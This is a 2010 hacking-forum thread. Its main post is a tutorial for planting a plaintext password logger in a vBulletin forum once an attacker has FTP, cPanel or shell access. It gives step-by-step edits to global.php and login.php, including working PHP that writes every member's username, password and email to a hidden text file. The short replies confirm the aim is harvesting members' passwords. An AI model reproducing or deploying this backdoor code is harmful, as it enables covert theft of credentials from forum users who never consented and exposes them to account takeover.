flAmingw0rm ` Posted January 18, 2010 Posted January 18, 2010 vBulletin Password Logging in this tutorial i will show you how to implement a plaintext password logger on a vBulletin Forum. So Let's Start. =============================================== Need: access to the site - ftp, cPanel, PHP Shell etc. =============================================== 1. open global.php which is located in the forum directory Look For: code: $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0; and change it to: Code: //$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0; 2. now open login.php which is in the same directory as global.php Look For: Code: process_new_login and paste this under it: $lg_username = strtolower($vbulletin->GPC["vb_login_username"]); $lg_password = $vbulletin->GPC["vb_login_password"]; $lg_file = "./includes/passwords.txt"; $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'"); while($row = @mysql_fetch_array($sql_query)) { if(strlen($lg_password) > 1 AND strlen($lg_username) > 1) { $fp1 = @fopen($lg_file, "a+"); @fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n"); @fclose($fp1); $f = @file($lg_file); $new = array_unique($f); $fp = @fopen($lg_file, "w"); foreach($new as $values) { @fputs($fp, $values); } @fclose($fp); } } Regards ~ flAmingw0rm Quote
flAmingw0rm ` Posted January 18, 2010 Author Posted January 18, 2010 nice code wtf ? plz dont spam xaxaxa Quote
HackMeUpReturns Posted March 7, 2010 Posted March 7, 2010 What's it exactl,what can i do with this? If you are having a vBulleting Board ( Forum ),you can log the members passwords Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.